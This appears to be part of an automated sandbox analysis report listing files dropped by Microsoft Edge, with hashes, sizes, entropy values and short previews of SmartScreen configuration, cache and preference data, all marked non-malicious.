                                                                                                                                                                                                                                                                                                                  SHA-256:D5743766AF0312C7B7728219FC24A03A4FB1C2A54A506F337953FBC2C1B847C7
                                                                                                                                                                                                                                                                                                                  SHA-512:70FE1C197AF507CC0D65E99807D245C896A40A4271BA1121F9B621980877B43019E584C48780951FC1AD2A5D7D146FC6EA4678139A5B38F9B6F7A5F1E2E86BA3
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:customSynchronousLookupUris_0
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):35302
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                                                  MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                                                  SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                                                  SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                                                  SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):81
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                                  MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                                  SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                                  SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                                  SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):3581
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.459693941095613
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:96:JTMhnytNaSA4BOsNQNhnUZTFGKDIWHCgL5tfHaaJzRHF+P1sYmnfHUdT+GWBH7Y/:KyMot7vjFU
                                                                                                                                                                                                                                                                                                                  MD5:BDE38FAE28EC415384B8CFE052306D6C
                                                                                                                                                                                                                                                                                                                  SHA1:3019740AF622B58D573C00BF5C98DD77F3FBB5CD
                                                                                                                                                                                                                                                                                                                  SHA-256:1F4542614473AE103A5EE3DEEEC61D033A40271CFF891AAA6797534E4DBB4D20
                                                                                                                                                                                                                                                                                                                  SHA-512:9C369D69298EBF087412EDA782EE72AFE5448FD0D69EA5141C2744EA5F6C36CDF70A51845CDC174838BAC0ADABDFA70DF6AEDBF6E7867578AE7C4B7805A8B55E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"models":[],"geoidMaps":{"gw_my":"https://malaysia.smartscreen.microsoft.com/","gw_tw":"https://taiwan.smartscreen.microsoft.com/","gw_at":"https://austria.smartscreen.microsoft.com/","gw_es":"https://spain.smartscreen.microsoft.com/","gw_pl":"https://poland.smartscreen.microsoft.com/","gw_se":"https://sweden.smartscreen.microsoft.com/","gw_kr":"https://southkorea.smartscreen.microsoft.com/","gw_br":"https://brazil.smartscreen.microsoft.com/","au":"https://australia.smartscreen.microsoft.com/","dk":"https://denmark.smartscreen.microsoft.com/","gw_sg":"https://singapore.smartscreen.microsoft.com/","gw_fr":"https://france.smartscreen.microsoft.com/","gw_ca":"https://canada.smartscreen.microsoft.com/","test":"https://eu-9.smartscreen.microsoft.com/","gw_il":"https://israel.smartscreen.microsoft.com/","gw_au":"https://australia.smartscreen.microsoft.com/","gw_ffl4mod":"https://unitedstates4.ss.wd.microsoft.us/","gw_ffl4":"https://unitedstates1.ss.wd.microsoft.us/","gw_eu":"https://europe.
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):130439
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                                  MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                                  SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                                  SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                                  SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):40
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                                  MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                                  SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                                  SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                                  SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):35302
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.99333285466604
                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:rRhaFePY38QBsj61g3g01LXoDGPpgb8KbMcnjrQCckBuJyqk3x8cBBT:rLP+TBK6ZQLXSsaMcnHQQcox80
                                                                                                                                                                                                                                                                                                                  MD5:0E06E28C3536360DE3486B1A9E5195E8
                                                                                                                                                                                                                                                                                                                  SHA1:EB768267F34EC16A6CCD1966DCA4C3C2870268AB
                                                                                                                                                                                                                                                                                                                  SHA-256:F2658B1C913A96E75B45E6ADB464C8D796B34AC43BAF1635AA32E16D1752971C
                                                                                                                                                                                                                                                                                                                  SHA-512:45F1E909599E2F63372867BC359CF72FD846619DFEB5359E52D5700E0B1BCFFE5FF07606511A3BFFDDD933A0507195439457E4E29A49EB6451F26186B7240041
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:.......murmur3.....IN...9.......0..X..#l....C....]......pv..E..........,..?.N?....V..B-.*.F.1....g|..._.>'.-(V... .=.7P.m....#}.r.....>.LE...G.A.h5........J..=..L^-.Zl++,..h..o.y..~j.]u...W...&s.........M..........h3b..[.5.]..V^w.........a.*...6g3..%.gy../{|Z.B..X.}5.]..t.1.H&B.[.).$Y......2....L.t...{...[WE.yy.]..e.v0..\.J3..T.`1Lnh.../..-=w...W.&N7.nz.P...z......'i..R6....../....t.[..&-.....T&l..e....$.8.."....Iq....J.v..|.6.M...zE...a9uw..'.$6.L..m$......NB).JL.G.7}8(`....J.)b.E.m...c.0I.V...|$....;.k.......*8v..l.:..@.F.........K..2...%(...kA......LJd~._A.N.....$3...5....Z"...X=.....%.........6.k.....F..1..l,ia..i.i....y.M..Cl.....*...}.I..r..-+=b.6....%...#...W..K.....=.F....~.....[.......-...../;....~.09..d.....GR..H.lR...m.Huh9.:..A H./)..D.F..Y.n7.....7D.O.a;>Z.K....w...sq..qo3N...8@.zpD.Ku......+.Z=.zNFgP._@.z.ic.......3.....+..j...an%...X..7.q..A.l.7.S2..+....1.s.b..z...@v..!.y...N.C.XQ.p.\..x8(.<.....cq.(
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):57
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                                  MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                                  SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                                  SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                                  SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):29
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
                                                                                                                                                                                                                                                                                                                  MD5:52E2839549E67CE774547C9F07740500
                                                                                                                                                                                                                                                                                                                  SHA1:B172E16D7756483DF0CA0A8D4F7640DD5D557201
                                                                                                                                                                                                                                                                                                                  SHA-256:F81B7B9CE24F5A2B94182E817037B5F1089DC764BC7E55A9B0A6227A7E121F32
                                                                                                                                                                                                                                                                                                                  SHA-512:D80E7351E4D83463255C002D3FDCE7E5274177C24C4C728D7B7932D0BE3EBCFEB68E1E65697ED5E162E1B423BB8CDFA0864981C4B466D6AD8B5E724D84B4203B
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:topTraffic_638004170464094982
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):575056
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999649474060713
                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:fXdhUG0PlM/EXEBQlbk19RrH76Im4u8C1jJodha:Ji80e9Rb7Tm4u8CnR
                                                                                                                                                                                                                                                                                                                  MD5:BE5D1A12C1644421F877787F8E76642D
                                                                                                                                                                                                                                                                                                                  SHA1:06C46A95B4BD5E145E015FA7E358A2D1AC52C809
                                                                                                                                                                                                                                                                                                                  SHA-256:C1CE928FBEF4EF5A4207ABAFD9AB6382CC29D11DDECC215314B0522749EF6A5A
                                                                                                                                                                                                                                                                                                                  SHA-512:FD5B100E2F192164B77F4140ADF6DE0322F34D7B6F0CF14AED91BACAB18BB8F195F161F7CF8FB10651122A598CE474AC4DC39EDF47B6A85C90C854C2A3170960
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...._+jE.`..}....S..1....G}s..E....y".Wh.^.W.H...-...#.A...KR...9b........>k......bU.IVo...D......Y..[l.yx.......'c=..I0.....E.d...-...1 ....m../C...OQ.........qW..<:N.....38.u..X-..s....<..U.,Mi..._.......`.Y/.........^..,.E..........j@..G8..N.... ..Ea...4.+.79k.!T.-5W..!..@+..!.P..LDG.....V."....L.... .(#..$..&......C.....%A.T}....K_.S..'Q.".d....s....(j.D!......Ov..)*d0)."(..%..-..G..L.}....i.....m9;.....t.w..0....f?..-..M.c.3.....N7K.T..D>.3.x...z..u$5!..4..T.....U.O^L{.5..=E..'..;.}(|.6.:..f!.>...?M.8......P.D.J.I4.<...*.y.E....>....i%.6..Y.@..n.....M..r..C.f.;..<..0.H...F....h.......HB1]1....u..:...H..k....B.Q..J...@}j~.#...'Y.J~....I...ub.&..L[z..1.W/.Ck....M.......[.......N.F..z*.{nZ~d.V.4.u.K.V.......X.<p..cz..>*....X...W..da3(..g..Z$.L4.j=~.p.l.\.[e.&&.Y ...U)..._.^r0.,.{_......`S..[....(.\..p.bt.g..%.$+....f.....d....Im..f...W ......G..i_8a..ae..7....pS.....z-H..A.s.4.3..O.r.....u.S......a.}..v.-/..... ...a.x#./:...sS&U.().xL...pg
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:raw G3 (Group 3) FAX, byte-padded
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):460992
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.999625908035124
                                                                                                                                                                                                                                                                                                                  Encrypted:true
                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:KaRwcD8XXTZGZJHXBjOVX3xFttENr4+3eGPnKvJWXrydqb:KaR5oZ2MBFt8r4+3eG/URdqb
                                                                                                                                                                                                                                                                                                                  MD5:E9C502DB957CDB977E7F5745B34C32E6
                                                                                                                                                                                                                                                                                                                  SHA1:DBD72B0D3F46FA35A9FE2527C25271AEC08E3933
                                                                                                                                                                                                                                                                                                                  SHA-256:5A6B49358772DB0B5C682575F02E8630083568542B984D6D00727740506569D4
                                                                                                                                                                                                                                                                                                                  SHA-512:B846E682427CF144A440619258F5AA5C94CAEE7612127A60E4BD3C712F8FF614DA232D9A488E27FC2B0D53FD6ACF05409958AEA3B21EA2C1127821BD8E87A5CA
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:...2lI.5.<C.;.{....._+jE.`..}....-...#.A...KR...l.M0,s...).9..........x.......F.b......jU....y.h'....L<...*..Z..*%.*..._...g.4yu...........'c=..I0..........qW..<:N....<..U.,Mi..._......'(..U.9.!........u....7...4. ..Ea...4.+.79k.!T.-5W..!..@+..$..t|1.E..7F...+..xf....z&_Q...-.B...)8R.c....0.......B.M.Z...0....&v..<..H...3.....N7K.T..D>.8......P.D.J.I4.B.H.VHy...@.Wc.Cl..6aD..j.....E..*4..mI..X]2.GH.G.L...E.F.=.J...@}j~.#...'Y.L[z..1.W/.Ck....L..X........J.NYd........>...N.F..z*.{nZ~d.N..../..6.\L...Q...+.w..p...>.S.iG...0]..8....S..)`B#.v..^.*.T.?...Z.rz.D'.!.T.w....S..8....V.4.u.K.V.......W.6s...Y.).[.c.X.S..........5.X7F...tQ....z.L.X..(3#j...8...i.[..j$.Q....0...]"W.c.H..n..2Te.ak...c..-F(..W2.b....3.]......c.d|.../....._...f.....d....Im..g.b..R.q.<x*x...i2..r.I()Iat..b.j.r@K.+5..C.....nJ.>*P,.V@.....s.4.3..O.r.....smd7...L.....].u&1../t.*.......uXb...=@.....wv......]....#.{$.w......i.....|.....?....E7...}$+..t).E.U..Q..~.`.)..Y@.6.h.......%(
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):9
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.169925001442312
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:CMzOn:CM6
                                                                                                                                                                                                                                                                                                                  MD5:B6F7A6B03164D4BF8E3531A5CF721D30
                                                                                                                                                                                                                                                                                                                  SHA1:A2134120D4712C7C629CDCEEF9DE6D6E48CA13FA
                                                                                                                                                                                                                                                                                                                  SHA-256:3D6F3F8F1456D7CE78DD9DFA8187318B38E731A658E513F561EE178766E74D39
                                                                                                                                                                                                                                                                                                                  SHA-512:4B473F45A5D45D420483EA1D9E93047794884F26781BBFE5370A554D260E80AD462E7EEB74D16025774935C3A80CBB2FD1293941EE3D7B64045B791B365F2B63
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:uriCache_
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):179
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.010466077477921
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YTyLSmafBoTfIeRDHtDozRLuLgfGBkGAeekVy8HfzXNPIAclTkCRvOn:YWLSGTt1o9LuLgfGBPAzkVj/T8lI+On
                                                                                                                                                                                                                                                                                                                  MD5:9F1C1EB148F525771E449A8727F36C22
                                                                                                                                                                                                                                                                                                                  SHA1:8CDBD6A7781A2AACA8C4DD95DC4DA750644119FD
                                                                                                                                                                                                                                                                                                                  SHA-256:CCE2DCC06EF1C6A0562A891387E0C0B56A15AE45C2D4F8FE73D7A27F4D8B2EE4
                                                                                                                                                                                                                                                                                                                  SHA-512:9C7690FF0B43E9305B788FD0CED5DB5C03E071D53A74135C8B7DC6A3693805E6C798AFF76D413121B06902048F5A8EEE23EFDCFD430D39C8B506AFFE4D21FA96
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"version":1,"cache_data":[{"file_hash":"da2d278eafa98c1f","server_context":"1;f94c025f-7523-6972-b613-ce2c246c55ce;unkn:100;0.01","result":1,"expiration_time":1736517560407146}]}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):87
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.415446034314543
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:3:YQ3JYq9xSs0dMEJAELJ2rjozQd:YQ3Kq9X0dMgAEwjj
                                                                                                                                                                                                                                                                                                                  MD5:3FA87FFDBFD627F217A5F052D6D3A7AC
                                                                                                                                                                                                                                                                                                                  SHA1:0746F46DE416E30212C78E240BF6B5352EE2EF9C
                                                                                                                                                                                                                                                                                                                  SHA-256:7C782809649AE44D26AD9EC63F900A8B306E91ED01410EEDD6A9AB778770ED2B
                                                                                                                                                                                                                                                                                                                  SHA-512:EDAEDD2E75B29829BE86D25CB0D894832FCA323FD12493133E9230007D3FA353F12F3DBC87DAD9FE2B86D0F26EC3814C9951975ADFF3421623C44642AA780894
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"user_experience_metrics.stability.exited_cleanly":false,"variations_crash_streak":14}
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):24842
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.034715430655188
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:768:DMkbJrT8IeQc5e1RhMgoSS8YiL5uTY3Jb:DMk1rT8H21RCAFuTQ
                                                                                                                                                                                                                                                                                                                  MD5:60D98886305F28276671F8BC2FD2F845
                                                                                                                                                                                                                                                                                                                  SHA1:5772E78CF2E7C569A26ACF7B0F2844DA9F9E94FA
                                                                                                                                                                                                                                                                                                                  SHA-256:E07DEF778ACC772CA1F1C64C4874AE17C59A77A68889342A9B7603F199F7DE7B
                                                                                                                                                                                                                                                                                                                  SHA-512:0459A3F7DDC71B9C513CA7864CF3BE7490898EFD9FC349D9C064EC19B3F1A1F6371A5E531FCC49FB1A21142636EAD4D964C1E695F8311248E992EC4C0A7971C8
                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13380890357381288","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_redirect_origin":"","last_seen_whats_new_page_version":"117.0.2045.47"},"data_use_measurement":{"data_used":{"services":{"background":{},"foreground":{}},"user":{"background":{},"foreground":{}}}},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97yIFoYvbAluiw2oRoYgIQ2nG2AqJY2U+koRXQbbMm3fMsEX9JMK3GLbeAvNjhrlo5GOJiTA/oXLTdG6qXtmMBDiyS59PvY7eCklyb4QcfFi7tpdwu3VBt1XNorvM4+RiU6+CjD0kb+pHz7rRm
                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                  Size (bytes):2278
                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.8317709062814655
                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                  SSDEEP:48:uiTrlKxrgxHxl9Il8uhld87PtIXZWCGUpPkJuxACd1rc:muYvePtIXZYJuu
                                                                                                                                                                                                                                                                                                                  MD5:8A3128296ADD1F863E2FDFC77E1A19DE
                                                                                                                                                                                                                                                                                                                  SHA1:278A66CD5DA49ACFB0C5CE92B4052581115FC412
                                                                                                                                                                                                                                                                                                                  SHA-256:473A8E02ED6FA20B0E398379B9BB843180BB7086E80DF7401FF2350F37DBBFE6
                                                                                                                                                                                                                                                                                                                  SHA-512:D0CEBDA0F50B9C47EB02D458787DB61F6ECCA46E3104D9741D232E93FB774EDA7BC83A6D15E4439E71A49BAF772FC7EA628F7D8CC01F4909C5B5FE2DB699396A
                                                                                                                                                                                                                                                                                                                  Malicious:false
